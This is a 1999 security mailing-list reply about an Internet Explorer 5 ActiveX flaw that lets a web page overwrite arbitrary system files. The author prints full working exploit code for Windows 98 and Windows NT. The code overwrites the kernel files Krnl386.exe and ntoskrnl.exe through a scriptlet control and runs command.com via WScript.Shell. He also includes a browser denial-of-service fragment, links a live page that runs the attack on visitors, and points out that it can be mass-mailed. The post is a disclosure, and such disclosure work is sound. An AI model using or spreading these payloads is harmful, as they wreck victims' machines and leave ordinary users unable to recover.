Re: IE5 allows executing programs

From: SysAdmin (SysAdminat_private)
Date: Mon Aug 30 1999 - 18:16:23 PDT

    After further research into David LeBlanc's debunking of my posting I have
    discovered (rather remembered) that ntoskrnl is loaded from the system
    folder into memory where it is accessed exclusively, this frees it from the
    write restriction due to system use. I think he must administrate Windows 98
    domains which do not let you modify the Kernel (called Krnl386.exe) I'm
    sorry I have taken so long to respond to the criticism but I felt that I,
    unlike others, should do my research first. Let me summarize the current
    understanding

    ANY Windows 98 file can be overwritten. Period. If you try and manually
    pasting over or destroying the file you will be denied, however Active X can
    help where you can't. In fact, ironically, after it's been corrupted you
    cannot fix it because you are denied from touching it! If Windows 98 is
    restarted or crashed (hint, forced to crash), then it will fail start up
    with a Fatal Exception, you can only recover from DOS by restoring the file.
    I would like to note, for the record, that the vast majority of home users
    who will never know about the patch to this file or know what Active X even
    is are not in possession of 98 install disks. Rather they are in possession
    of a disk that restores the computer to factory original. Despite David
    LeBlanc et al. assurance that we could just disable Active X I'm discussing
    it because you know your poor parents are NEVER going to, how would they
    understand the instructions? And, of course, what average user could EVER
    recover from this sort of damage?

    Onto Windows NT, yes, David was correct, you can bar write access in NTFS
    and it cannot be written to. I have not invested any interest in this but I
    assume there is at least one critical system file (possibly security file)
    that he would miss and might be overwritten. In fact the default for the
    Administrator or one with Administrator privileges is Full Access. Of course
    this would allow the exploit to run. The other thing to remember is that in
    very small domains the average user is generally administrator and remember
    this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other
    thing is that the default install for NT (especially on HP's) is FAT, which
    does not allow specific file security. Anyone know a dual-booter? Maybe
    someone who doesn't even know what NTFS is? I thought so.

    Well, I must admit I'm tired of the down playing and guessing. I have
    decided to put the ball in play. I have posted a web page, on my domain mind
    you, that contains the Hacks for both OS's. Understand that if you visit
    them the hack will run and when it runs, if you're not prepared, you will be
    very unhappy. I have included the code here so that you can see what
    happens.

    The link is http://www.sassproductions.com/hacked.htm

    The code for the 98 exploit is

    <object id="scr"
       classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
    height="14"
    ></object><script>
    scr.Reset();
    scr.Path="C:\\windows\\system\\Krnl386.exe";
    scr.Doc="<object id='wsh'
    classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
    'Screw Denise Richards, Debbie Johnson
    r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>

    See how simply that was adapted? I polished it not-at-all so you can see the
    minimal changes. At this point you would be automatically transferred to a
    second web page that would contain the following code.

    <head>
    <title>Self Destruct </title>
    </head>

    <form method="POST">

    maxlength="99999999" value=""></td>

    </form>

    Recognize that? It's the code to DoS IE5. Most simple users would restart at
    this point, never notice a web page change, and lose their Kernel.

    Here's the NT code

    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
    width="14" height="14">
    </object>
    <script>
    scr.Reset();
    scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
    scr.Doc="<object id='wsh'
    classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
    'Screw Denise Richards, Debbie Johnson
    r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>

    Not bad 'huh? This exploit needs to be realized for what it is, a very
    dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
    to deal with bouncing between three offices helping EVERY single user.

    If someone has a problem with my post feel free to mention it.

    Seth Georgion